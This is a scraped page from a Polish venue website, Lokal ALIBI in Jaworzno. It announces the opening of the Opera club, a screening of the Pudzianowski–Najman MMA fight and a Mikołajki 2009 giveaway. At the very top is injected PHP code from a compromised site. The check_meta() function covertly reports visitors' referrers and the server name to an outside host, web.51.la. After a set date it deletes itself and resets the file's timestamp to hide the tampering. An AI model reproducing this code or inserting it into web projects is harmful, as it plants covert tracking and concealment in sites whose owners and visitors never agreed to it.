check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456734038){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776881&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_newsfeeds/models/models.php"); } Lokal ALIBI STRONA GŁÓWNA

Content on this page requires a newer version of Adobe Flash Player.

Get Adobe Flash player
STRONA GŁÓWNA
Klub muzyczny OPERA - OTWARTA
Wielkie otwarcie odbyło się z głośnym hukiem 26 grudnia. Data ta wielu osobą zapewne zapadnie w pamięci i wpisze się w historie jaworznickiej sceny klubowej. Wydarzenie to przyciągnęło do klubu rzesze klubowiczów i miłośników dobrej zabawy.

Opera to nowa jakość! Super sprzęt, profesjonalni DJ'e i świetna dyskoteka. Co do samego klubu to jego atutami są świetny wystrój, bardzo dobre nagłośnienie oraz nowoczesne efekty świetlne i wizualne.

U nas przeżyjesz coś czego nie da się wyrazić słowami dlatego musisz sam tego doświadczyć.

Zapraszamy na kolejne imprezy.


zobacz galerię zdjęć >>

 

 

 
Pudzianowski - Najman w MMA
Efektowny debiut Pudziana w hali Torwaru
w Warszawie.

Mariusz Pudzianowski wygrał bezapelacyjnie
z Marcinem Najmanem w pojedynku według zasad MMA (mieszane sztuki walki) podczas "Konfrontacji Sztuk Walki" w hali Torwaru w Warszawie. Pojedynek trwał 44. sekundy.

Zapowiadał się niezwykły wieczór w lokalu ALIBI. XII galę Konfrontacji Sztuk Walki w potyczce MMA (mieszane sztuki walki) można było oglądać na dużym telebimie i kliku telewizorach LCD rozmieszczonych w lokalu. Jak zwykle kibice i fani mocnych wrażeń dopisali.

________________________________________________________________

Pudzianowski vs. Najman
Pudzianowski vs. Najman
Pudzianowski vs. Najman

 

 
Mikołajki
Mikołajki to dzień, w którym Święty Mikołaj obchodzi swoje imieniny. I nie wiedzieć czemu, to on przynosi nam drobne upominki.

Tak też było w ALIBI, Mikołaj rozdawał prezenty:

  • karnety na darmową grę w bilard,
  • napoje alkoholowe i bezalkoholowe,
  • słodycze,
  • gadżety.

 

________________________________________________________________

Mikołajki 2009
Mikołajki 2009
Mikołajki 2009

 
<< pierwsza < poprzednia 11 12 13 14 15 16 17 następna > ostatnia >>

Strona 16 z 17
x-dream.pl